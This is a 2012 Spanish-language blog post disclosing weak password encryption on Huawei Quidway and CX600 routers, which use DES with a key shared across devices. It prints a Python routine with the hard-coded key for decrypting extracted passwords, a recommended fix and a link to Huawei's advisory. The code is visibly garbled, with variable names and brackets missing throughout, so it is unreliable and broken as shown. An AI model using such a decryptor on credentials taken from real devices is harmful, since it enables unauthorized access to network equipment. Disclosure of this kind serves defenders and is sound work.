¡Bienvenidos a todos!

Espero que disfrutes de esta web y te sea de gran ayuda

29 de noviembre de 2012

Routers Huawei al DESCUBIERTO:


Para routers:



Huawei Quidway series
Huawei CX600

Otros modelos también pueden ser vulnerables,pero no fueron probados.


DETALLES DE LA VULNERABILIDAD:

Dispositivos de Huawei tienen un algoritmo de cifrado de contraseñas débiles. Con este esquema, las contraseñas son ofuscadas  y cifradas con DES, usando una clave de cifrado compartida entre todos los dispositivos afectados. Este esquema de cifrado no utiliza ningún mecanismocontraseña salteadaComo consecuencia, las contraseñas extraídas del dispositivo de una víctima puede ser descifrada de forma instantánea.

Un procedimiento de Python que decodifica una contraseña dada se incluye a continuación. Una vez terminado, el procedimiento decrypt_password () devuelve la contraseña en texto claro.

CÓDIGO:


from Crypto.Cipher import DES
def decode_char(c):
    if == 'a':
        = '?'
    else:
        = c
    return ord(r) - ord('!')
def ascii_to_binary(s):
    assert len(s) == 24
    out = [0]*18
    = 0
    = 0
    for in range(0len(s), 4):
        = decode_char(s[i + 0])
        = (y << 6) & 0xffffff
        = decode_char(s[i + 1])
        = (y | k) & 0xffffff
        = (y << 6) & 0xffffff
        = decode_char(s[i + 2])
        = (y | k) & 0xffffff
        = (y << 6) & 0xffffff
        = decode_char(s[i + 3])
        = (y | k) & 0xffffff
        out[j+2= chr(y       & 0xff)
        out[j+1= chr((y>>8)  & 0xff)
        out[j+0= chr((y>>16) & 0xff)
        += 3
    return "".join(out)
def decrypt_password(p):
    = ascii_to_binary(p)
    = r[:16]
    = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    = d.decrypt(r)
    return r.rstrip("\x00")
SOLUCIÓN: 
 Se recomienda almacenar las contraseñas utilizando un algoritmo de hash correcto, en lugar de aprovechar el cifrado simétrico. Por el momento, esta cuestión ha sido abordada por Huawei conaviso de seguridad Huawei-SA-20120827-01-CX600 ("Actualización asesoramiento de seguridad sobre el riesgo de que alguien irrumpa Contraseña Debido al algoritmo de cifrado DES"). Más detalles están disponibles en la siguiente URL:

http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
AGRADECIMIENTOS:
 http://blog.emaze.net/
(No nos hacemos responsables del mal uso de esto)